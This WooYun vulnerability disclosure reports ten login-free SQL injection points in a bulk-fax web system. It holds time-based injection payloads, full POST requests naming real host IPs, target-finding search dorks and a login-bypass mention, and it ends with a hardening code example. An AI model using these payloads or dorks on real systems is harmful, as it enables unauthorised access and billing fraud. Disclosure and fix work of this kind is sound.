
Vulnerability Summary (24 followers)

Defect ID: wooyun-2015-0110126

Title: A fax system has ten SQL injection points requiring no login (faxes can be sent for free, past fax contents queried, etc.)

Affected vendor: cncert

Author: YY-2012

Submitted: 2015-04-24 15:25

Fixed: 2015-07-27 09:50

Published: 2015-07-27 09:50

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]

Tags: (none)



Vulnerability Details

Disclosure status:

2015-04-24: Details sent to the vendor; awaiting vendor handling
2015-04-28: Vendor confirmed; details disclosed to the vendor only
2015-05-01: Details opened to third-party security partners
2015-06-22: Details disclosed to core white hats and relevant domain experts
2015-07-02: Details disclosed to regular white hats
2015-07-12: Details disclosed to intern white hats
2015-07-27: Details disclosed to the public

Brief description:

Sending a fax is billed, just like making a phone call. Good grief... would you still dare to use a system like this?

Detailed description:

Cases:



Searching Baidu for intitle:"传真群发系统" or FOFA for title="传真系统" turns up more cases.
The universal-password login works; after logging in I was stunned: faxes can be sent for free and past fax records queried..
All 10 injection points require no login.

http://地址/user/action/fax_stat.php?current_page=1&findenddate=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&findstartdate=2015-04-19
Parameter: findenddate
http://地址/user/action/fax_stat.php?current_page=1&findenddate=2015-04-23&findstartdate=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/
Parameter: findstartdate
http://地址/user/bankpay/bankpay_check_account.php?account=-1'%20OR%203*2*1%3d6%20AND%20000355%3d000355%20--%20&action=check
Parameter: account
http://地址/user/http/httpnews.php?id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&type=html
http://地址/user/http/httprequest.php?area_code=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&groupid=1&requestcontent=number_section
Parameter: area_code
http://地址/user/http/httprequest.php?province_code=hebei'%20AND%203*2*1%3d6%20AND%20'000zzp0'%3d'000zzp0&requestcontent=area
Parameter: province_code
POST /user/action/forgetpwd_action.php HTTP/1.1
Content-Length: 198
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://113.105.225.250:8888/
Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0
Host: 113.105.225.250:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
button=%e6%8f%90%e4%ba%a4&action=getpwd&email=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&username=igwyhlgw
Parameter: email
POST /user/action/forgetpwd_action.php HTTP/1.1
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://113.105.225.250:8888/
Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0
Host: 113.105.225.250:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
button=%e6%8f%90%e4%ba%a4&action=getpwd&email=sample%40email.tst&username=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/
Parameter: username
POST /user/bankpay/chargeportal_action.php HTTP/1.1
Content-Length: 195
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://113.105.225.250:8888/
Cookie: PHPSESSID=g72kr1urlg60uhnij1mekq47n0
Host: 113.105.225.250:8888
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
account=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&action=charge&channel=bank_ICBC&money=&orderAmount=1
Parameter: account
POST /user/action/login_action.php HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://119.145.255.46:8888/index.html
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Host: 119.145.255.46:8888
Content-Length: 80
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: PHPSESSID=cuiafoms2arf10c124vgfg6nr2
action=login&logintype=username&account=asdasd&password=asdasd&userauthcode=muoi
Parameter: account. When using sqlmap, the --time-sec option must be added for the injection to work.


The universal password can be used to log into the system.

Proof of vulnerability:

(Five screenshots were attached to the original report; they are not reproduced here.)


Fix recommendation:

Filter user input.
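As an added illustration (not the vendor's code, which the report does not include), here is a reconstruction of how a fax_stat.php-style date filter becomes injectable, beside a hardened version that validates the dates and binds them with PDO prepared statements; the table and column names (fax_log, send_time, pages, user_id) are assumed:

```php
<?php
// Added example, not the vendor's source. Table/column names are assumed.

// VULNERABLE pattern: request values are spliced straight into the SQL
// string, so a findenddate containing a quote and sleep() (as in the PoC
// above) is parsed by MySQL as part of the query.
function fax_stat_vulnerable(mysqli $db, array $get)
{
    $start = $get['findstartdate'] ?? '';
    $end   = $get['findenddate'] ?? '';
    $sql = "SELECT id, send_time, pages FROM fax_log "
         . "WHERE send_time BETWEEN '$start' AND '$end'";
    return $db->query($sql);
}

// Hardened: accept only YYYY-MM-DD that is also a real calendar date.
function valid_date(string $s): bool
{
    if (!preg_match('/^(\d{4})-(\d{2})-(\d{2})$/', $s, $m)) {
        return false;
    }
    return checkdate((int)$m[2], (int)$m[3], (int)$m[1]);
}

// Hardened: validate shape first, then bind as parameters so the values
// can never be parsed as SQL. Scoping by user_id also stops one account
// from reading another account's fax history. Create the PDO handle with
// PDO::ATTR_EMULATE_PREPARES set to false so the server does the binding.
function fax_stat_hardened(PDO $db, array $get, int $userId): array
{
    $start = $get['findstartdate'] ?? '';
    $end   = $get['findenddate'] ?? '';
    if (!valid_date($start) || !valid_date($end)) {
        http_response_code(400);
        return [];
    }
    $stmt = $db->prepare(
        'SELECT id, send_time, pages FROM fax_log '
        . 'WHERE user_id = :uid AND send_time BETWEEN :start AND :end'
    );
    $stmt->execute([':uid' => $userId, ':start' => $start, ':end' => $end]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}
```

The same two steps (whitelist the expected shape, then bind) apply to the other nine parameters in the report, including the login form's account and password fields, which is what closes the universal-password bypass.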

Copyright notice: when reposting, please credit the source YY-2012@WooYun


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2015-04-28 09:48

Vendor reply:

CNVD confirmed the described vulnerability; no direct handling channel with the software vendor (or the website operating unit) has been established yet, so the case is pending claim.

Latest status:

None yet